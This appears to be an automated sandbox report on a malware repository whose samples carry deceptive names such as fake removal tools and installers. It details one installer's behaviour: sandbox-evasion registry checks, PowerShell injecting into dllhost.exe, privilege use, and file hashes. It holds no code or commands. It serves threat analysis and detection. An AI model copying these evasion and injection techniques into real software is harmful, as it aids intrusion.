Overview
overview
10Static
static
10zvgfd-main...iz.bat
windows10-2004-x64
1zvgfd-main...lt.exe
windows10-2004-x64
zvgfd-main/Client.bat
windows10-2004-x64
10zvgfd-main...lt.exe
windows10-2004-x64
zvgfd-main... .exe
windows10-2004-x64
10zvgfd-main...ol.exe
windows10-2004-x64
10zvgfd-main...ol.exe
windows10-2004-x64
10zvgfd-main...ve.bat
windows10-2004-x64
10zvgfd-main...ve.exe
windows10-2004-x64
10zvgfd-main...ke.bat
windows10-2004-x64
10zvgfd-main...V2.exe
windows10-2004-x64
10zvgfd-main...ll.exe
windows10-2004-x64
10zvgfd-main...up.exe
windows10-2004-x64
8zvgfd-main/Output.exe
windows10-2004-x64
10zvgfd-main/Part 1.bat
windows10-2004-x64
10zvgfd-main/Part 2.bat
windows10-2004-x64
1zvgfd-main...om.exe
windows10-2004-x64
1zvgfd-main...er.exe
windows10-2004-x64
10zvgfd-main/Server.exe
windows10-2004-x64
10zvgfd-main/Uni.exe
windows10-2004-x64
10zvgfd-main/Uni.exe
windows10-2004-x64
10zvgfd-main...ol.exe
windows10-2004-x64
10zvgfd-main...ol.exe
windows10-2004-x64
10zvgfd-main...nt.exe
windows10-2004-x64
10zvgfd-main...st.exe
windows10-2004-x64
10zvgfd-main/asjdfg.exe
windows10-2004-x64
10zvgfd-main...-3.dll
windows10-2004-x64
3zvgfd-main...h2.dll
windows10-2004-x64
3zvgfd-main...-3.dll
windows10-2004-x64
1zvgfd-main/main.exe
windows10-2004-x64
7zvgfd-main/ncat.exe
windows10-2004-x64
1zvgfd-main...ad.exe
windows10-2004-x64
10Analysis
-
max time kernel
150s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
15-07-2024 16:14
Static task
static1
Behavioral task
behavioral1
Sample
zvgfd-main/Are You Skibidy, The Quiz.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral2
Sample
zvgfd-main/Client-built.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
zvgfd-main/Client.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral4
Sample
zvgfd-main/Client_built.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral5
Sample
zvgfd-main/Empyrean Removal Tool .exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral6
Sample
zvgfd-main/Empyrean Removal Tool.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral7
Sample
zvgfd-main/Empyrean Removal Tool.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral8
Sample
zvgfd-main/Fanta.Live.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral9
Sample
zvgfd-main/Fanta.Live.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral10
Sample
zvgfd-main/Fanta_Is_Better_Than_Coke.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral11
Sample
zvgfd-main/Frozen Loader V2.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral12
Sample
zvgfd-main/Install.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral13
Sample
zvgfd-main/OperaGXSetup.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral14
Sample
zvgfd-main/Output.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral15
Sample
zvgfd-main/Part 1.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral16
Sample
zvgfd-main/Part 2.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral17
Sample
zvgfd-main/Phantom.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral18
Sample
zvgfd-main/PyMain Installer.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral19
Sample
zvgfd-main/Server.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral20
Sample
zvgfd-main/Uni.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral21
Sample
zvgfd-main/Uni.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral22
Sample
zvgfd-main/VIrus removal tool.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral23
Sample
zvgfd-main/Virus removal tool.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral24
Sample
zvgfd-main/XClient.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral25
Sample
zvgfd-main/XClientTest.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral26
Sample
zvgfd-main/asjdfg.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral27
Sample
zvgfd-main/libcrypto-3.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral28
Sample
zvgfd-main/libssh2.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral29
Sample
zvgfd-main/libssl-3.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral30
Sample
zvgfd-main/main.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral31
Sample
zvgfd-main/ncat.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral32
Sample
zvgfd-main/payload.exe
Resource
win10v2004-20240709-en
General
-
Target
zvgfd-main/PyMain Installer.exe
-
Size
163KB
-
MD5
1a7d1b5d24ba30c4d3d5502295ab5e89
-
SHA1
2d5e69cf335605ba0a61f0bbecbea6fc06a42563
-
SHA256
b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
-
SHA512
859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
SSDEEP
3072:TQpsSyjlzA664oL8tIoDJxGtIVORPrdAHjl3+uwF+iBDZ/wXxnTFKe8kaz:TQpsSyjlzfnoNGxGo6PrdAHwtMxn4e8N
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4368 created 616 4368 powershell.EXE 5 -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe -
Drops file in System32 directory 9 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4368 set thread context of 2736 4368 powershell.EXE 86 -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 15 Jul 2024 16:18:05 GMT" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={D26FCF0C-3455-4117-9513-05B993A31899}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4368 powershell.EXE 4368 powershell.EXE 4368 powershell.EXE 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe 2736 dllhost.exe -
Suspicious behavior: LoadsDriver 64 IoCs
pid Process 4840 Process not Found 3100 Process not Found 2140 Process not Found 1860 Process not Found 3024 Process not Found 864 Process not Found 2976 Process not Found 4904 Process not Found 4552 Process not Found 4596 Process not Found 2608 Process not Found 3432 Process not Found 5056 Process not Found 1088 Process not Found 3132 Process not Found 2460 Process not Found 2528 Process not Found 1784 Process not Found 744 Process not Found 2268 Process not Found 4372 Process not Found 3960 Process not Found 644 Process not Found 2468 Process not Found 3616 Process not Found 2616 Process not Found 464 Process not Found 2988 Process not Found 5064 Process not Found 1172 Process not Found 4512 Process not Found 3292 Process not Found 1016 Process not Found 2040 Process not Found 4412 Process not Found 2052 Process not Found 2940 Process not Found 888 Process not Found 920 Process not Found 3136 Process not Found 372 Process not Found 4668 Process not Found 1304 Process not Found 3524 Process not Found 4744 Process not Found 4076 Process not Found 1000 Process not Found 4092 Process not Found 3160 Process not Found 4564 Process not Found 4868 Process not Found 3912 Process not Found 2132 Process not Found 2852 Process not Found 2768 Process not Found 5092 Process not Found 668 Process not Found 1820 Process not Found 2264 Process not Found 1212 Process not Found 3020 Process not Found 3904 Process not Found 4128 Process not Found 4256 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4368 powershell.EXE Token: SeDebugPrivilege 4368 powershell.EXE Token: SeDebugPrivilege 2736 dllhost.exe Token: SeShutdownPrivilege 3512 Explorer.EXE Token: SeCreatePagefilePrivilege 3512 Explorer.EXE Token: SeShutdownPrivilege 3512 Explorer.EXE Token: SeCreatePagefilePrivilege 3512 Explorer.EXE Token: SeAuditPrivilege 2692 svchost.exe Token: SeShutdownPrivilege 3512 Explorer.EXE Token: SeCreatePagefilePrivilege 3512 Explorer.EXE Token: SeShutdownPrivilege 3512 Explorer.EXE Token: SeCreatePagefilePrivilege 3512 Explorer.EXE Token: SeShutdownPrivilege 3512 Explorer.EXE Token: SeCreatePagefilePrivilege 3512 Explorer.EXE Token: SeShutdownPrivilege 3512 Explorer.EXE Token: SeCreatePagefilePrivilege 3512 Explorer.EXE Token: SeShutdownPrivilege 3512 Explorer.EXE Token: SeCreatePagefilePrivilege 3512 Explorer.EXE Token: SeShutdownPrivilege 3512 Explorer.EXE Token: SeCreatePagefilePrivilege 3512 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2044 svchost.exe Token: SeIncreaseQuotaPrivilege 2044 svchost.exe Token: SeSecurityPrivilege 2044 svchost.exe Token: SeTakeOwnershipPrivilege 2044 svchost.exe Token: SeLoadDriverPrivilege 2044 svchost.exe Token: SeSystemtimePrivilege 2044 svchost.exe Token: SeBackupPrivilege 2044 svchost.exe Token: SeRestorePrivilege 2044 svchost.exe Token: SeShutdownPrivilege 2044 svchost.exe Token: SeSystemEnvironmentPrivilege 2044 svchost.exe Token: SeUndockPrivilege 2044 svchost.exe Token: SeManageVolumePrivilege 2044 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2044 svchost.exe Token: SeIncreaseQuotaPrivilege 2044 svchost.exe Token: SeSecurityPrivilege 2044 svchost.exe Token: SeTakeOwnershipPrivilege 2044 svchost.exe Token: SeLoadDriverPrivilege 2044 svchost.exe Token: SeSystemtimePrivilege 2044 svchost.exe Token: SeBackupPrivilege 2044 svchost.exe Token: SeRestorePrivilege 2044 svchost.exe Token: SeShutdownPrivilege 2044 svchost.exe Token: SeSystemEnvironmentPrivilege 2044 svchost.exe Token: SeUndockPrivilege 2044 svchost.exe Token: SeManageVolumePrivilege 2044 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2044 svchost.exe Token: SeIncreaseQuotaPrivilege 2044 svchost.exe Token: SeSecurityPrivilege 2044 svchost.exe Token: SeTakeOwnershipPrivilege 2044 svchost.exe Token: SeLoadDriverPrivilege 2044 svchost.exe Token: SeSystemtimePrivilege 2044 svchost.exe Token: SeBackupPrivilege 2044 svchost.exe Token: SeRestorePrivilege 2044 svchost.exe Token: SeShutdownPrivilege 2044 svchost.exe Token: SeSystemEnvironmentPrivilege 2044 svchost.exe Token: SeUndockPrivilege 2044 svchost.exe Token: SeManageVolumePrivilege 2044 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2044 svchost.exe Token: SeIncreaseQuotaPrivilege 2044 svchost.exe Token: SeSecurityPrivilege 2044 svchost.exe Token: SeTakeOwnershipPrivilege 2044 svchost.exe Token: SeLoadDriverPrivilege 2044 svchost.exe Token: SeSystemtimePrivilege 2044 svchost.exe Token: SeBackupPrivilege 2044 svchost.exe Token: SeRestorePrivilege 2044 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3512 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4368 wrote to memory of 2736 4368 powershell.EXE 86 PID 4368 wrote to memory of 2736 4368 powershell.EXE 86 PID 4368 wrote to memory of 2736 4368 powershell.EXE 86 PID 4368 wrote to memory of 2736 4368 powershell.EXE 86 PID 4368 wrote to memory of 2736 4368 powershell.EXE 86 PID 4368 wrote to memory of 2736 4368 powershell.EXE 86 PID 4368 wrote to memory of 2736 4368 powershell.EXE 86 PID 4368 wrote to memory of 2736 4368 powershell.EXE 86 PID 2736 wrote to memory of 616 2736 dllhost.exe 5 PID 2736 wrote to memory of 672 2736 dllhost.exe 7 PID 2736 wrote to memory of 960 2736 dllhost.exe 12 PID 672 wrote to memory of 2740 672 lsass.exe 47 PID 2736 wrote to memory of 384 2736 dllhost.exe 13 PID 2736 wrote to memory of 448 2736 dllhost.exe 14 PID 2736 wrote to memory of 1028 2736 dllhost.exe 15 PID 2736 wrote to memory of 1104 2736 dllhost.exe 17 PID 2736 wrote to memory of 1120 2736 dllhost.exe 18 PID 2736 wrote to memory of 1184 2736 dllhost.exe 19 PID 2736 wrote to memory of 1216 2736 dllhost.exe 20 PID 2736 wrote to memory of 1260 2736 dllhost.exe 21 PID 2736 wrote to memory of 1324 2736 dllhost.exe 22 PID 2736 wrote to memory of 1356 2736 dllhost.exe 23 PID 2736 wrote to memory of 1476 2736 dllhost.exe 24 PID 2736 wrote to memory of 1500 2736 dllhost.exe 25 PID 2736 wrote to memory of 1576 2736 dllhost.exe 26 PID 2736 wrote to memory of 1588 2736 dllhost.exe 27 PID 2736 wrote to memory of 1656 2736 dllhost.exe 28 PID 2736 wrote to memory of 1720 2736 dllhost.exe 29 PID 2736 wrote to memory of 1748 2736 dllhost.exe 30 PID 2736 wrote to memory of 1776 2736 dllhost.exe 31 PID 2736 wrote to memory of 1836 2736 dllhost.exe 32 PID 672 wrote to memory of 2740 672 lsass.exe 47 PID 2736 wrote to memory of 1980 2736 dllhost.exe 33 PID 2736 wrote to memory of 1988 2736 dllhost.exe 34 PID 2736 wrote to memory of 2044 2736 dllhost.exe 35 PID 2736 wrote to memory of 1740 2736 dllhost.exe 36 PID 2736 wrote to memory of 1804 2736 dllhost.exe 37 PID 2736 wrote to memory of 2112 2736 dllhost.exe 38 PID 2736 wrote to memory of 2212 2736 dllhost.exe 40 PID 2736 wrote to memory of 2384 2736 dllhost.exe 41 PID 2736 wrote to memory of 2480 2736 dllhost.exe 42 PID 2736 wrote to memory of 2488 2736 dllhost.exe 43 PID 2736 wrote to memory of 2664 2736 dllhost.exe 44 PID 2736 wrote to memory of 2684 2736 dllhost.exe 45 PID 2736 wrote to memory of 2692 2736 dllhost.exe 46 PID 2736 wrote to memory of 2740 2736 dllhost.exe 47 PID 2736 wrote to memory of 2796 2736 dllhost.exe 48 PID 2736 wrote to memory of 2816 2736 dllhost.exe 49 PID 2736 wrote to memory of 2824 2736 dllhost.exe 50 PID 2736 wrote to memory of 3028 2736 dllhost.exe 51 PID 2736 wrote to memory of 3068 2736 dllhost.exe 52 PID 2736 wrote to memory of 2276 2736 dllhost.exe 53 PID 2736 wrote to memory of 3424 2736 dllhost.exe 55 PID 2736 wrote to memory of 3512 2736 dllhost.exe 56 PID 2736 wrote to memory of 3632 2736 dllhost.exe 57 PID 2736 wrote to memory of 3824 2736 dllhost.exe 58 PID 2736 wrote to memory of 3980 2736 dllhost.exe 60 PID 2736 wrote to memory of 3572 2736 dllhost.exe 62 PID 2736 wrote to memory of 3552 2736 dllhost.exe 65 PID 2736 wrote to memory of 4684 2736 dllhost.exe 67 PID 2736 wrote to memory of 2720 2736 dllhost.exe 68 PID 2736 wrote to memory of 1288 2736 dllhost.exe 69 PID 2736 wrote to memory of 3412 2736 